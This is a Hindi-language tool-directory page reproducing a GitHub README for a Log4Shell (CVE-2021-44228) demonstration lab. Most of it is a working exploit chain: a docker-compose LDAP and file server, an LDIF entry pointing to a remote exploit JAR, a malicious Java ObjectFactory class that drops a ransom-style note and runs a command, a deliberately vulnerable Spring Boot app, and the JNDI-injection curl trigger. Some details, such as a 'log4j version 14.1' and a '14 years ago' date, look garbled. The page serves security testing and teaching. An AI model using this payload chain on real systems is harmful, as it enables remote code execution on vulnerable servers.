Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-44228-log4j-test — Log4Shell (CVE-2021-44228) शोषण को LDAP सर्वर, दुर्भावनापूर्ण JNDI पेलोड, और सुरक्षा परीक्षण के लिए संवेदनशील Spring Boot एप्लिकेशन के साथ प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/bumheehan/cve-2021-44228-log4j-test
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubbumheehan/cve-2021-44228-log4j-test

cve-2021-44228-log4j-test

Log4Shell (CVE-2021-44228) शोषण को LDAP सर्वर, दुर्भावनापूर्ण JNDI पेलोड, और सुरक्षा परीक्षण के लिए संवेदनशील Spring Boot एप्लिकेशन के साथ प्रदर्शित करता है।

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2021-44228-log4j-test

परीक्षण

1. LDAP सर्वर और हैकिंग फ़ाइल डाउनलोड सर्वर

1.1 Docker-compose निष्पादन

  • docker-compose.yml

    root@kitploit:~
    version: '2'
    services:
      dockerdj:
        image: openidentityplatform/opendj:latest
        container_name: ldap
        environment:
          ROOT_USER_DN: "cn=han"
          ROOT_PASSWORD: "han"
          BASE_DN: "dc=bumbing,dc=xyz"
        ports:
          - "389:1389"
          - "636:1636"
          - "4444:4444"
        volumes:
          - "./opendj/logs:/opt/opendj/data/logs"
      nginx:
        image: nginx:latest
        container_name: nginx
        ports:
          - "7080:80"
        volumes:
          - "./file:/usr/share/nginx/html:ro"
          - "./conf/nginx.conf:/etc/nginx/nginx.conf"
    
  • docker-compose निष्पादन

    root@kitploit:~
    docker-compose up -d
    

1.2. Ldif जोड़ना

  • add.ldif

    root@kitploit:~
    version: 1
    
    dn: dc=bumbing,dc=xyz
    objectClass: domain
    objectClass: top
    dc: bumbing
    
    dn: cn=log4j,dc=bumbing,dc=xyz
    objectClass: javaContainer
    objectClass: javaNamingReference
    objectClass: javaObject
    objectClass: top
    cn: class
    javaClassName: xyz.bumbing.log4j.Exploit
    javaCodebase: http://{fileServer}:7080/exploit-1.jar
    javaFactory: xyz.bumbing.log4j.Exploit
    
  • हैकिंग फ़ाइल जानकारी वाली एंट्री जोड़ने का आदेश

    root@kitploit:~
    ldapadd -D "cn=han" -w han -H ldap://{ldapServer} -f add.ldif
    
  • ldap परीक्षण (पैरामीटर क्रम महत्वपूर्ण)

    root@kitploit:~
    curl ldap://{ldapServer}/cn=log4j,dc=bumbing,dc=xyz
    

2. दुर्भावनापूर्ण फ़ाइल

  • जावा 8u191 से पहले के संस्करणों में कमजोरी पाई गई, जावा संस्करण 8 के साथ बिल्ड करें

2.1 दुर्भावनापूर्ण फ़ाइल बिल्ड करना

  • दुर्भावनापूर्ण कोड (अन्य दुर्भावनापूर्ण फ़ाइलों को डाउनलोड करने का आदेश जोड़ा जा सकता है)

    root@kitploit:~
    	public class Exploit implements javax.naming.spi.ObjectFactory{
            @Override
            public Object getObjectInstance(Object o, Name name, Context context, Hashtable<?, ?> hashtable) throws Exception {
        
                try {
                    new File("/Users//test").createNewFile();
                    String msg = "your computer has our virus. if you want to recover your computer, send bitcoin our wallet";
                    FileOutputStream fileOutputSteam = new FileOutputStream(new File("/Users/hanbeomhee/test"));
                    StringBuilder sb = new StringBuilder();
                    sb.append(o.toString()).append("\n");
                    sb.append(name).append("\n");
                    sb.append(msg);
                    fileOutputSteam.write(sb.toString().getBytes(StandardCharsets.UTF_8));
                    fileOutputSteam.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
    						Runtime.getRuntime().exec("open /Users//test");
                return null;
            }
        
        }
    
  • बिल्ड आदेश

    root@kitploit:~
    ./gradlew clean build
    
  • यदि स्थानीय सर्वर नहीं है, तो exploit-1.jar फ़ाइल को फ़ाइल सर्वर के docker/file फ़ोल्डर में अपलोड करें

  • http://{fileServer}:7080/exploit-1.jar डाउनलोड की पुष्टि करें

3. कमजोरी वाला सर्वर खोलना

  • ग्रैडल संरचना

    root@kitploit:~
    plugins {
        	id 'org.springframework.boot' version '2.6.1'
        	id 'io.spring.dependency-management' version '1.0.11.RELEASE'
        	id 'java'
        }
        
        group = 'xyz.bumbing'
        version = '0.0.1-SNAPSHOT'
        sourceCompatibility = '8'
        
        configurations {
        	compileOnly {
        		extendsFrom annotationProcessor
        	}
        }
        
        repositories {
        	mavenCentral()
        }
        
        dependencies {
        	implementation 'org.springframework.boot:spring-boot-starter-web'
        	compileOnly 'org.projectlombok:lombok'
        	annotationProcessor 'org.projectlombok:lombok'
        	testImplementation 'org.springframework.boot:spring-boot-starter-test'
        	implementation "org.springframework.boot:spring-boot-starter-log4j2"
        	modules {
        		module("org.springframework.boot:spring-boot-starter-logging") {
        			replacedBy("org.springframework.boot:spring-boot-starter-log4j2", "Use Log4j2 instead of Logback")
        		}
        	}
        }
        
        test {
        	useJUnitPlatform()
        }
    
    • dependency में log4j संस्करण 14.1 की जाँच करें
  • सर्वर कोड

    root@kitploit:~
    @SpringBootApplication
    @RestController
    @Slf4j
    public class Log4jtestApplication {
    
    	public static void main(String[] args) {
    		SpringApplication.run(Log4jtestApplication.class, args);
    	}
    
    	@GetMapping("/log4j")
    	public void test(String param, HttpServletRequest request){
    		log.info(request.getHeader("User-Agent"));
    	}
    }
    
  • निष्पादन आदेश (8u191 से पहले के संस्करण से बिल्ड और निष्पादित करना आवश्यक है)

    root@kitploit:~
    java -jar build/libs/log4jtest-0.0.1-SNAPSHOT.jar
    

4. निष्पादन

4.1 निष्पादन

root@kitploit:~
curl --location --request GET 'localhost:8080/log4j' \
--header 'User-Agent: ${jndi:ldap://localhost/cn=log4j,dc=bumbing,dc=xyz}'
टूल डाउनलोड करें